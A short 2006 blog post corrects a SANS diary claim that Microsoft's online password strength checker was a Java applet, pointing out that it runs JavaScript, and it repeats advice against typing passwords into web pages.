April 24, 2006

Microsoft password checker - misinformation

The blog entry at http://isc.sans.org/diary.php?storyid=1285 has some bad information that needs to be corrected regarding Microsoft's recently published password strength checker.

In this blog post, the autor states:
GOOD it's a java applet that appears to run locally so your password is never sent over the internet


This is clearly NOT a Java applet if you take a cursory peek the HTML source! The password input button named 'pc001' has an event handler named 'onKeyUp' which calls a JavaScript method named EvalPwdStrength. This method is downloaded from here.

I notified SANS of the misinformation and requested a correction be published. I guess this is a good reminder that you can't believe everything you read on the internet; even from a popular site such as SANS (including my blog too!) :)

I agree with the SANS author's assertion that typing your passwords into a web page, no matter where it's hosted, is a bad idea. Just follow the guidelines and you'll have strong passwords.

If you have trouble remembering lots of strong passwords, try using a password manager program such as:


cheers
jk

No comments: